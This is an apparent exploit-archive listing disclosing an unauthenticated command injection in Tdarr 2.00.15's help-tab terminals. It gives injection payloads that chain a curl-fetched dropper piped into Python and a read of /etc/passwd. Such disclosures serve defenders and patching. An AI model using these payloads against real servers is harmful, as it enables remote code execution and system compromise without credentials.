Tdarr 2.00.15 Command Injection

Tdarr 2.00.15 Command Injection: Posted Mar 11, 2022; Authored by Sam Smith; Tdarr version 2.00.15 suffers from a command injection vulnerability.; tags | exploit; SHA-256 | b601d9698e0c203090cb7edb4fa2426b862f26bbb2b5b2d2432ab593f2df42f2; Download | Favorite | View

Tdarr 2.00.15 Command Injection

# Exploit Title: Tdarr 2.00.15 - Command Injection
# Date: 10/03/2022
# Exploit Author: Sam Smith
# Vendor Homepage: https://tdarr.io
# Software Link: https://f000.backblazeb2.com/file/tdarrs/versions/2.00.15/linux_arm64/Tdarr_Server.zip
# Version: 2.00.15 (likely also older versions)
# Tested on: 2.00.15

Exploit:

The Help tab contains a terminal for both FFmpeg and HandBrake. These terminals do not include input filtering which allows the user to chain commands and spawn a reverse shell.

eg. `--help; curl https://192.168.0.2/dropper.py | python` or `--help;whoami;cat /etc/passwd`.

Tdarr is not protected by any auth by default and no credentials are required to trigger RCE

Top Authors In Last 30 Days

Red Hat 236 files
Ubuntu 56 files
Debian 19 files
LiquidWorm 16 files
Apple 9 files
Gentoo 5 files
Alter Prime 3 files
Google Security Research 3 files
Pierre Kim 2 files
EQSTLab 2 files

File Archives

Systems

AIX (430)
Apple (2,126)
BSD (378)
CentOS (61)
Cisco (1,954)
Debian (7,163)
Fedora (1,693)
FreeBSD (1,247)
Gentoo (4,604)
HPUX (881)
iOS (393)
iPhone (108)
IRIX (220)
Juniper (71)
Linux (51,945)
Mac OS X (696)
Mandriva (3,105)
NetBSD (256)
OpenBSD (490)
RedHat (17,337)
Slackware (941)
Solaris (1,615)
SUSE (1,444)
Ubuntu (9,987)
UNIX (9,475)
UnixWare (188)
Windows (6,784)
Other

Tdarr 2.00.15 Command Injection

Tdarr 2.00.15 Command Injection

File Archive:

November 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

Tdarr 2.00.15 Command Injection

Share This

Tdarr 2.00.15 Command Injection

File Archive:

November 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems